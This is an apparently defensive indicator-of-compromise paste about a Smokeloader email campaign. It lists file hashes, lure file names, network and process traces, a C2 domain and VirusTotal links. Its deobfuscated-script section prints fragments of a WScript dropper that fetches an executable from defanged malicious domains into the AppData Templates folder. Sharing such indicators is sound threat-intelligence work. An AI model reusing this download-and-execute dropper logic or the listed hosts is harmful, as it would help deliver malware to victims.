Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #smokeloader #WSH #LZH
- https://pastebin.com/JmthzrL4
- previous contact:
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- attack_vector
- --------------
- email attach (lzh) > js > WSH > GET > %AppData%\MS\Windows\Templates\*.exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d
- File name Рахунки ТОВ Техник.lzh
- File size 26.37 KB
- SHA-256 d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46
- File name 11_2018p.xlsx
- File size 12.28 KB
- SHA-256 fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10
- File name pax. 00-128 corp. TEXHIK.xls.js
- File size 13.99 KB
- SHA-256 0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21
- File name sysm.exe !This program cannot be run in DOS mode.
- File size 518.5 KB
- activity
- **************
- deobfuscated_script
- dropper_script:
- var wsh = new ActiveXObject("wscript.shell");
- var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
- try { var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
- var sh = new ActiveXObject("shell.application");
- HTTP.Open("GET", "h11p:\ districoperav{.} icu/neifo/sysm.exe", false)
- else
- HTTP.Open("GET", "h11p:\ varanasiclick{.} ru/neifo/sysm.exe", false)
- netwrk
- --------------
- wscript.exe 2872 79.133.98.58 80 ESTABLISHED
- comp
- --------------
- 79.133.98.58 districoperav{.} icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0
- C2 h11p:\ aviatorssm{.} bit/
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"
- "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"
- persist
- --------------
- n/a (detects vm, sleeps)
- drop
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe
- # # #
- lzh https://www.virustotal.com/#/file/59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d/details
- xlsx https://www.virustotal.com/#/file/d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46/details
- js https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/details
- url1 https://www.virustotal.com/#/url/d1aef86fefbdd3fa733f4ea8068e038ef5c39e112f50a7ccaedbc1bb2ffcf03a/details
- url2 https://www.virustotal.com/#/url/b5758fb74969c0c998286e5bb2c0242e507a1e6037a3785b03edf2174bca878e/detection
- exe https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/details
- https://analyze.intezer.com/#/analyses/08a7d313-03dd-4d6f-9f67-b662f083a559
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement